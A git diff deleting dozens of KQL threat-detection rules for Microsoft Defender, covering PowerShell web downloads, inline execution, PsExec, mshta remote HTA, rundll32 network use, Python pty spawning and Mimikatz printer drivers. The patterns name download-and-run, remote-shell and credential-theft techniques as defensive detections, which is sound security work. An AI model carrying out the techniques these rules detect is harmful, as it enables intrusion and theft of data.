diff --git a/Execution/PowerShell_Script_Run_in_AppData.kql b/Execution/PowerShell_Script_Run_in_AppData.kql deleted file mode 100644 index afece119..00000000 --- a/Execution/PowerShell_Script_Run_in_AppData.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019/01/09 -// Level: medium -// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\")) \ No newline at end of file diff --git a/Execution/PowerShell_Web_Download.kql b/Execution/PowerShell_Web_Download.kql deleted file mode 100644 index b25ef740..00000000 --- a/Execution/PowerShell_Web_Download.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/24 -// Level: medium -// Description: Detects suspicious ways to download files or content using PowerShell -// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105 -DeviceProcessEvents -| where ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " \ No newline at end of file diff --git a/Execution/PowerShell_as_a_Service_in_Registry.kql b/Execution/PowerShell_as_a_Service_in_Registry.kql deleted file mode 100644 index db6f8eca..00000000 --- a/Execution/PowerShell_as_a_Service_in_Registry.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: oscd.community, Natalia Shornikova -// Date: 2020/10/06 -// Level: high -// Description: Detects that a powershell code is written to the registry as a service. -// Tags: attack.execution, attack.t1569.002 -DeviceRegistryEvents -| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey contains "\\Services" and RegistryKey endswith "\\ImagePath" \ No newline at end of file diff --git a/Execution/Powershell_Inline_Execution_From_A_File.kql b/Execution/Powershell_Inline_Execution_From_A_File.kql deleted file mode 100644 index b0993719..00000000 --- a/Execution/Powershell_Inline_Execution_From_A_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/25 -// Level: medium -// Description: Detects inline execution of PowerShell code from a file -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ") \ No newline at end of file diff --git a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql b/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql deleted file mode 100644 index 7dffb2f5..00000000 --- a/Execution/PrinterNightmare_Mimikatz_Driver_Name.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Markus Neis, @markus_neis, Florian Roth -// Date: 2021/07/04 -// Level: critical -// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 -// Tags: attack.execution, attack.t1204, cve.2021.1675, cve.2021.34527 -DeviceRegistryEvents -| where (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer")) \ No newline at end of file diff --git a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql deleted file mode 100644 index 864ecfca..00000000 --- a/Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql +++ /dev/null 
@@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022/06/09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe"))))) \ No newline at end of file diff --git a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 2d36359f..00000000 
--- a/Execution/Process_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: medium -// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create"))) \ No newline at end of file diff --git a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql b/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql deleted file mode 100644 index ef5df7d2..00000000 --- a/Execution/Proxy_Execution_Via_Wuauclt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team -// Date: 2020/10/12 -// Level: high -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll "))) \ No newline at end of file 
diff --git a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql b/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql deleted file mode 100644 index c1db5f78..00000000 --- a/Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) -// Tags: attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/Execution/PsExec_Service_Execution.kql b/Execution/PsExec_Service_Execution.kql deleted file mode 100644 index 124c9951..00000000 --- a/Execution/PsExec_Service_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems) -// Date: 2017/06/12 -// Level: medium -// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution -// Tags: attack.execution -DeviceProcessEvents -| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" \ No newline at end of file diff --git a/Execution/PsExec_Service_File_Creation.kql b/Execution/PsExec_Service_File_Creation.kql deleted file mode 100644 index 8280b56f..00000000 --- a/Execution/PsExec_Service_File_Creation.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2017/06/12 -// Level: low -// Description: Detects default PsExec service filename which indicates PsExec service installation and execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceFileEvents -| where FolderPath endswith "\\PSEXESVC.exe" \ No newline at end of file diff --git a/Execution/Psexec_Execution.kql b/Execution/Psexec_Execution.kql deleted file mode 100644 index 84b896e7..00000000 --- a/Execution/Psexec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: omkar72 -// Date: 2020/10/30 -// Level: medium -// Description: Detects user accept agreement execution in psexec commandline -// Tags: attack.execution, attack.t1569, attack.t1021 -DeviceProcessEvents -| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c" \ No newline at end of file diff --git a/Execution/Python_Inline_Command_Execution.kql b/Execution/Python_Inline_Command_Execution.kql deleted file mode 100644 index 6cd4f03e..00000000 --- a/Execution/Python_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Python") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))) \ No newline at end of file 
diff --git a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql b/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql deleted file mode 100644 index 675fc6f5..00000000 --- a/Execution/Python_Spawning_Pretty_TTY_on_Windows.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nextron Systems -// Date: 2022/06/03 -// Level: high -// Description: Detects python spawning a pretty tty -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn") \ No newline at end of file diff --git a/Execution/Query_Usage_To_Exfil_Data.kql b/Execution/Query_Usage_To_Exfil_Data.kql deleted file mode 100644 index d4a9d73a..00000000 --- a/Execution/Query_Usage_To_Exfil_Data.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: medium -// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe" \ No newline at end of file diff --git a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql b/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql deleted file mode 100644 index 6ee0ff69..00000000 --- a/Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/07 -// Level: medium -// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql b/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql deleted file mode 100644 index 6b4d33b2..00000000 --- a/Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/15 -// Level: medium -// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE") \ No newline at end of file diff --git a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql deleted file mode 100644 index e8f1f303..00000000 --- a/Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/07/17 -// Level: medium -// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. -// Tags: attack.defense_evasion, attack.t1574, attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl"))) \ No newline at end of file diff --git a/Execution/RemCom_Service_File_Creation.kql b/Execution/RemCom_Service_File_Creation.kql deleted file mode 100644 index 4564d7da..00000000 --- a/Execution/RemCom_Service_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/04 -// Level: medium -// Description: Detects default RemCom service filename which indicates RemCom service installation and execution -// Tags: attack.execution, attack.t1569.002, attack.s0029 -DeviceFileEvents -| where FolderPath endswith "\\RemComSvc.exe" \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql deleted file mode 100644 index 23d22f38..00000000 --- a/Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql +++ /dev/null 
@@ -1,11 +0,0 @@ -// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/08 -// Level: medium -// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8. -Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. -Use this rule to detect instances of older versions of Anydesk using the compromised certificate -This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections. - -// Tags: attack.execution, attack.initial_access -DeviceProcessEvents -| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall"))) \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql deleted file mode 100644 index 407483d4..00000000 --- a/Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Ali Alwashali -// Date: 2023/10/10 -// Level: low -// Description: Detects the execution of a system command via the ScreenConnect RMM service. -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql b/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql deleted file mode 100644 index 868f9720..00000000 --- a/Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Ali Alwashali -// Date: 2023/10/10 -// Level: low -// Description: Detects the creation of files in a specific location by ScreenConnect RMM. -ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. - -// Tags: attack.execution, attack.t1059.003 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\" \ No newline at end of file diff --git a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql b/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql deleted file mode 100644 index 723a8b9d..00000000 --- a/Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/18 -// Level: medium -// Description: Detects a remote DLL load event via "rundll32.exe". -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file 
diff --git a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql b/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql deleted file mode 100644 index 952fe894..00000000 --- a/Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019/09/12 -// Level: medium -// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). -// Tags: attack.execution, attack.t1059.001, attack.t1021.006 -DeviceProcessEvents -| where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql deleted file mode 100644 index d0784cd7..00000000 --- a/Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/08 -// Level: high -// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file -// Tags: attack.defense_evasion, attack.execution, attack.t1218.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/Execution/Renamed_CURL.EXE_Execution.kql b/Execution/Renamed_CURL.EXE_Execution.kql deleted file mode 100644 index 5fedd523..00000000 --- a/Execution/Renamed_CURL.EXE_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/09/11 -// Level: medium -// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl")) \ No newline at end of file diff --git a/Execution/Renamed_FTP.EXE_Execution.kql b/Execution/Renamed_FTP.EXE_Execution.kql deleted file mode 100644 index a2a27522..00000000 --- a/Execution/Renamed_FTP.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe")) \ No newline at end of file diff --git a/Execution/Renamed_Jusched.EXE_Execution.kql b/Execution/Renamed_Jusched.EXE_Execution.kql deleted file mode 100644 index 059e77e2..00000000 --- a/Execution/Renamed_Jusched.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Swisscom -// Date: 2019/06/04 -// Level: high -// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group -// Tags: attack.execution, attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe")) \ No newline at end of file diff --git a/Execution/Renamed_NirCmd.EXE_Execution.kql b/Execution/Renamed_NirCmd.EXE_Execution.kql deleted file mode 100644 index fe83139c..00000000 
--- a/Execution/Renamed_NirCmd.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2024/03/11 -// Level: high -// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe"))) \ No newline at end of file diff --git a/Execution/Renamed_PingCastle_Binary_Execution.kql b/Execution/Renamed_PingCastle_Binary_Execution.kql deleted file mode 100644 index 98720000..00000000 --- a/Execution/Renamed_PingCastle_Binary_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024/01/11 -// Level: high -// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe"))) \ No newline at end of file diff --git a/Execution/Renamed_PsExec_Service_Execution.kql b/Execution/Renamed_PsExec_Service_Execution.kql deleted file mode 100644 index 030057ea..00000000 --- a/Execution/Renamed_PsExec_Service_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators -// Tags: attack.execution -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "psexesvc.exe" and (not(FolderPath =~ "C:\\Windows\\PSEXESVC.exe")) \ No newline at end of file diff --git a/Execution/Ruby_Inline_Command_Execution.kql b/Execution/Ruby_Inline_Command_Execution.kql deleted file mode 100644 index 29b2f989..00000000 --- a/Execution/Ruby_Inline_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: medium -// Description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\ruby.exe" or ProcessVersionInfoOriginalFileName =~ "ruby.exe") \ No newline at end of file diff --git a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql deleted file mode 100644 index bd9b3783..00000000 --- a/Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community -// Date: 2020/10/17 -// Level: high -// Description: Detects PowerShell script execution via input stream redirect -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file 
diff --git a/Execution/Rundll32_Execution_Without_Parameters.kql b/Execution/Rundll32_Execution_Without_Parameters.kql deleted file mode 100644 index 6fb33be4..00000000 --- a/Execution/Rundll32_Execution_Without_Parameters.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz, Relativity -// Date: 2021/01/31 -// Level: high -// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module -// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 -DeviceProcessEvents -| where ProcessCommandLine in~ ("rundll32.exe", "rundll32") \ No newline at end of file diff --git a/Execution/Rundll32_Internet_Connection.kql b/Execution/Rundll32_Internet_Connection.kql deleted file mode 100644 index 2acd0757..00000000 --- a/Execution/Rundll32_Internet_Connection.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/11/04
-// Level: medium
-// Description: Detects a rundll32 that communicates with public IP addresses
-// Tags: attack.defense_evasion, attack.t1218.011, attack.execution
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/Execution/Rundll32_UNC_Path_Execution.kql b/Execution/Rundll32_UNC_Path_Execution.kql
deleted file mode 100644
index 17761d13..00000000
--- a/Execution/Rundll32_UNC_Path_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
